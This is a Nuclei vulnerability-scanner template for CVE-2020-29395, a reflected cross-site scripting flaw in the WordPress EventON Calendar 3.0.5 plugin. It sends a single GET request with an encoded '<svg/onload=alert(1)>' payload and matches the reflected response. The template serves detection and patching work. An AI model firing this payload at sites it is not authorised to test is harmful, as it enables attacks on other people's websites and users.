nuclei-templates/http/cves/2020/CVE-2020-29395.yaml

52 lines
1.9 KiB
YAML

id: CVE-2020-29395
info:
name: Wordpress EventON Calendar 3.0.5 - Cross-Site Scripting
author: daffainfo
severity: medium
description: Wordpress EventON Calendar 3.0.5 is vulnerable to cross-site scripting because it allows addons/?q= XSS via the search field.
impact: |
Successful exploitation of this vulnerability could lead to the execution of arbitrary script code in the context of the affected website, potentially allowing an attacker to steal sensitive information or perform unauthorized actions.
remediation: |
Update to the latest version of the Wordpress EventON Calendar plugin (3.0.6) to mitigate this vulnerability.
reference:
- https://github.com/mustgundogdu/Research/tree/main/EventON_PLUGIN_XSS
- https://www.myeventon.com/news/
- https://nvd.nist.gov/vuln/detail/CVE-2020-29395
- http://packetstormsecurity.com/files/160282/WordPress-EventON-Calendar-3.0.5-Cross-Site-Scripting.html
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2020-29395
cwe-id: CWE-79
epss-score: 0.05489
epss-percentile: 0.92412
cpe: cpe:2.3:a:myeventon:eventon:*:*:*:*:*:wordpress:*:*
metadata:
max-request: 1
vendor: myeventon
product: eventon
framework: wordpress
tags: cve,cve2020,wordpress,xss,wp-plugin,packetstorm,myeventon
http:
- method: GET
path:
- '{{BaseURL}}/addons/?q=%3Csvg%2Fonload%3Dalert(1)%3E'
matchers-condition: and
matchers:
- type: word
part: body
words:
- "<svg/onload=alert(1)>"
- type: word
part: header
words:
- text/html
- type: status
status:
- 200
# digest: 4a0a0047304502200972956ed918cfcf08d885d13d4aee62642025ac8552d3ca599cd614d939e458022100df80232a9f3c22888846f91a378fb3aa1cacf8a40c38d5b29492284d06689b86:922c64590222798bb761d5b6d8e72950